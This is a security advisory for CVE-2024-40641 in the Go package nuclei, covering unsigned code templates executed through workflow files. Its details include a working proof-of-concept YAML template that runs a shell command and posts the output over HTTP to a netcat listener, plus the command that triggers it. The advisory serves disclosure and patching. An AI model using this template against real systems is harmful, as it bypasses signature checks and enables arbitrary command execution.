CVE-2024-40641 – github.com/projectdiscovery/nuclei/v3

Package

Manager: go
Name: github.com/projectdiscovery/nuclei/v3
Vulnerable Version: >=0 <3.3.0

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N

EPSS: 0.00046 pctl0.13692

Details

projectdiscovery/nuclei allows unsigned code template execution through workflows ### Summary Find a way to execute code template without -code option and signature. ### Details write a `code.yaml`: ```yaml id: code info: name: example code template author: ovi3 code: - engine: - sh - bash source: | id http: - raw: - | POST /re HTTP/1.1 Host: {{Hostname}} {{code_response}} workflows: - matchers: - name: t ``` using nc to listen on 80: ```bash nc -lvvnp 80 ``` execute PoC template with nuclei: ```bash ./nuclei -disable-update-check -w code.yaml -u http://127.0.0.1 -vv -debug ``` and nc will get `id` command output. We use `-w` to specify a workflow file, not `-t` to template file. and notice there is a `workflows` field in code.yaml to pretend to be a workflow file. Test in Linux and Nuclei v3.2.9 ### Impact Some web applications inherit from Nuclei and allow users to edit and execute workflow files. In this case, users can execute arbitrary commands. (Although, as far as I know, most web applications use -t to execute)

Metadata

Created: 2024-07-17T19:32:23Z
Modified: 2024-08-20T14:57:15Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-c3q9-c27p-cw9h/GHSA-c3q9-c27p-cw9h.json
CWE IDs: ["CWE-78"]
Alternative ID: GHSA-c3q9-c27p-cw9h
Finding: F004
Auto approve: 1